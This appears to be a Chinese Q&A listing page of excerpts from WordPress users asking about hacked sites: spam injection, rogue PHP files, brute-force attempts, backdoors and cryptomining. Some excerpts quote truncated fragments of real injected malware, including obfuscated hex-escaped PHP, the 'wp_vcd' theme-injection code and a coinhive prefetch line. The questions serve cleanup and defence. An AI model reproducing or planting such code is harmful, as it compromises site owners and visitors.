您当前的位置:首页 > TAG信息列表 > hacked

  • 查找注入到内容中的垃圾链接的提示

    时间:2014-02-16

    我在一个客户的网站上工作,我注意到帖子有一个隐藏的<div> 填充到dick pills等的垃圾邮件链接。为了运气好,我在数据库表中搜索了一些关键字,但没有找到匹配项。我还搜索了所有文件中的代码,也没有找到匹配项。我知道Wordpress黑客可能很难删除,而且他们会竭尽全力使其难以找到。但也许有一些“常见的嫌疑犯”我可以检查,或者也许有一些我可以寻找的告密迹象。I\'m not asking for anyone to solve this specific hack. 我只是想知道(总体上)

  • WordPress需要wp-app.php还是wp-apps.php?

    时间:2014-03-20

    我忽略的一些Wordpress博客突然在其顶部文件夹中生成了3个PHP文件:wp app。php、wp应用程序。php和wp寄存器。php,以前没有。根据谷歌的一些搜索结果检查他们的内容,表明我被一个常见的Wordpress漏洞所渗透。由于它们不断重新生成,我考虑将它们置为空白,并将文件权限设置为只读或更少。但如果WP需要它们,我不想损害站点功能。

  • 通过重定向黑客来攻击他们

    时间:2014-04-10

    我的网站越来越受欢迎,随着它越来越受欢迎,黑客也越来越多。昨晚我访问了我的安全日志,发现每天大约有10个人试图访问 /?author=1 /?author=2 /?author=3 /?author=4 但我没有这些用户ID,所以会为它们生成404。他们还对用户名运行猜测机器人: admin administrator wordpress 现在,我想控制他们。。。因此,每次他们尝试访问这两个选项中的任何一个: 1. visiting /

  • Restrict access to xmlrpc.php

    时间:2014-08-01

    我是Wordpress的新手,最近我注意到大量流量会影响以下内容:162.242.170.222 - - [01/Aug/2014:08:18:54 -0500] \"POST /xmlrpc.php HTTP/1.0\" 503 4859 162.242.170.222 - - [01/Aug/2014:08:19:01 -0500] \"POST /xmlrpc.php HTTP/1.0\" 503 4859 162.242.170.222 - - [01/Aug/2014:08:19

  • 如何对抗这种wp-info.php漏洞?

    时间:2014-11-04

    几周以来,我的WordPress网站上引入了一个漏洞,我无法找到明确的方法删除它。我称之为“wp-info.php漏洞”,因为它会wp-info.php WordPress目录中的某个位置的文件,有时被深埋。此漏洞的症状不容易看到。网站的主要功能看起来没有受到影响,但当我查看访问日志时,我看到我自己的网站提供了一些奇怪的URL:成人聊天生涯martunis van sant约会占星术黑人单身者免费个人广告。。。还有很多相似的IMAGE REMOVED该页面显示我自己的网站结构和菜单,但内容被一些垃圾文本取

  • WordPress中的防黑客或安全-这是真的吗?

    时间:2015-01-09

    多年来,我一直使用WordPress作为网站平台,这对我作为开发人员和客户来说都很方便。但最近几个月,我客户的几个网站遭到黑客攻击,我很担心这个问题。如果你不考虑密码brootforcing的选项,黑客如何访问网站的文件系统并上传恶意文件?如果不使用安全插件(例如iThemes Security)来增加负载,它真的能保护站点吗?您对服务器端有什么建议?在没有更新的情况下保护WordPress是真的吗?有时无法自动更新旧项目。有两个网站被黑客入侵:v3。x(可以理解)和v4。x(最新)如果您能给我建议,我将

  • 黑客如何获取可湿性粉剂的用户名?

    时间:2015-06-12

    最近,我在我的一些WordPress网站上尝试了暴力攻击,攻击者使用的是实际用户名,而不是默认的admin(已删除)。没有管理员权限,他们怎么可能知道站点数据库中的用户名?(假设他们没有直接使用恶意软件从我这里得到)有什么方法可以防止这种情况发生?顺便说一句:我的所有网站都使用当前版本的WordPress。谢谢你的帮助!

  • 我是不是被黑了?主题文件顶部的神秘代码

    时间:2015-06-14

    我在所有主题文件的顶部发现了以下内容。我的本地副本没有!WordPress v4。2.2在Linux服务器上运行。插件:高级自定义字段<?php if(!isset($GLOBALS[\"\\x61\\156\\x75\\156\\x61\"])) {$ua=strtolower($_SERVER[\"\\x48\\124\\x54\\120\\x5f\\125\\x53\\105\\x52\\137\\x41\\107\\x45\\116\\x54\"]); if ((! strstr($ua,\

  • 在哪里可以找到WordPress安全风险的列表?

    时间:2018-01-10

    我正在做一个项目,我需要找到一个不同的安全风险或恶意代码的列表,这些代码在现在或过去被黑客使用过。我可以一个接一个地去搜索,但要收集一个像样的列表需要很多时间。那么,有没有人知道我应该在哪里搜索,或者有没有人收集了类似的东西?

  • 编辑网站中奇怪的乱七八糟的JavaScript被黑客入侵了?

    时间:2018-01-25

    客户网站以“enfold”主题运行,该主题具有“enfold Advanced Layout Editor”。目前该编辑器已损坏-可能是由于旧版本与php或其他原因。无论如何,为了解决这个问题,我查看了实际的数据库表和页面内容下方的大约20行空行,我发现了这个看起来非常奇怪的JavaScript代码:<script> </script> <script> </script> <script> </script> <scr

  • 如何从被黑客攻击的页面中删除内容?

    时间:2018-02-09

    我的WordPress/Woocommerce网站遭到黑客攻击,我在管理员用户的个人资料页面上找到了一个视频类别以及指向死掉的内部视频链接的URL。(我附上了用户页面的图像。)我正在想办法解决这个问题。任何帮助都将不胜感激。谢谢

  • Dreamhost上的WordPress安装程序中存在恶意软件。<link rel=‘dns-prefetch’href=‘//cohive.com’/>

    时间:2018-03-12

    我正在尝试创建一个网站。这是现场直播。你可以看到google检测到一个恶意软件。在源代码中,您将看到三行<link rel=\'dns-prefetch\' href=\'//coinhive.com\' />还有一个地方可以看到coinhive。这基本上是在客户的台式机/笔记本电脑上挖掘monero的代码Q) 我们如何首先找出这个恶意软件是如何进入网站的?部分:1)是因为dreamhost的共享主机被黑客攻击吗?2) 是哪个插件做的?3) 如何删除此项。4) 我们如何确保它不会回来:(一直在

  • 这段代码是做什么的?(注入代码被黑客攻击)

    时间:2018-04-30

    下面的代码被注入到我的wordpress函数主题中。有人能解释一下代码的作用吗?这是怎么做到的?$div_code_name = \"wp_vcd\"; $funcfile = __FILE__; if(!function_exists(\'theme_temp_setup\')) { $path = $_SERVER[\'HTTP_HOST\'] . $_SERVER[\'REQUEST_URI\']; if (stripos($_SERVER[

  • 如何在我的WordPress站点中找到安全漏洞?

    时间:2018-06-10

    上一天我注意到我的网站被黑客入侵,我的网站上安装了一个PHP后门。病毒扫描程序报告我的wp-content/uploads 我自己没有上传。它包括一个wordpress插件和一些php shell。我不知道这个文件是怎么放在那里的,通过使用这个文件,黑客可以访问我主机的根文件夹,创建文件并更改文件的权限以允许执行它们。我不知道这对黑客有什么帮助,对他/她有什么好处,但他可以在我的主机上创建一个文件,并在谷歌搜索控制台上声称我的网站是其财产。我想知道:如何在我的网站上找到安全漏洞</黑客在谷歌搜索控制

  • 未在Google搜索控制台URL中找到不熟悉的查询字符串

    时间:2018-07-10

    一个旧的客户端网站被黑客入侵。在删除旧站点并重建新站点之后,Google搜索控制台有相当多(50左右)的URL没有使用此地址模式找到。/类别/业务/%3C?php%20bloginfo(\'rss2\\u url\');%20?%3E我知道它可能引用WordPress中的默认rss功能,但有些字符似乎可疑。这些地址是WordPress的标准地址吗?这些地址是否可能是由泄露的代码引起的?如果是,指标是什么?

  • WP网站遭黑客攻击,Serp Google垃圾邮件

    时间:2018-08-08

    这一切都始于谷歌广告暂停我的广告,因为他们在我的WP网站上发现了恶意软件。我尝试使用一些免费插件进行扫描:Wordefence、anti-malware和Securi,或者像sitecheck这样的在线工具。苏库里。net和透明报告。谷歌。com,但我没有发现任何恶意软件,尽管SERP已被破坏!!大约有100个假url,如下所示:https://www.example.com/?lang=en&s=%2525E5%2525A4%2525A7%2525E5%2525A5%252596%2525E8%

  • 您似乎已经安装了WordPress。要重新安装,请先清除旧的数据库表

    时间:2018-09-05

    我的网站被黑客破坏了,我正在尝试从备份中恢复。我已删除所有旧文件并尝试从备份中还原。我复制了public\\u html中的所有WP文件。还原数据库后,它会抛出一个错误“您似乎已经安装了WordPress。要重新安装,请先清除旧的数据库表”。我是WordPress的新手。有人能帮我解决这个问题吗。提前谢谢。

  • 站点被黑客攻击-WordPress Divi站点-找不到解决该问题的位置?

    时间:2018-09-08

    我需要帮助,试图找到在我管理的wordpress网站上如何解决问题的方法。如果你去http://www.thedailycrave.com 您将看到,如果您向下滚动到网站底部的页脚上方,地图下方有两行红色文本链接。它显示在所有页面上。当我使用Google Inspector编辑器时,它显示了从这些链接创建的大约20多个html文件,其中之一如下:http://thedailycrave.com/chelsea-home-football-shirts-2019.html - 但我甚至找不到要删除的ht

  • 有人试图入侵我的网站,需要指导

    时间:2018-10-21

    有多个IP正在尝试访问我的目录。我正在使用iThemes安全插件,它显示了以下列表。这些是所有IP每分钟都试图访问的文件。https://www.{My Website Name}.com/tag/feed/ https://www.{My Website Name}.com/premium-titanium/undefined https://www.{My Website Name}.com/wp-content/uploads/2017/11/supra-on-w

  • Open content directory help!

    时间:2018-10-31

    我刚刚发现我有一个打开的wp内容目录,在那里你可以看到我在mysite上的所有文件-pdf、jpgs等。这些文件也是仅供会员使用的。。。。所有上传的图片等。我想知道:a)是否有任何方法可以判断是否有人去过那里,以及他们是否下载了我的任何文件?b) 如何关闭此目录?非常感谢。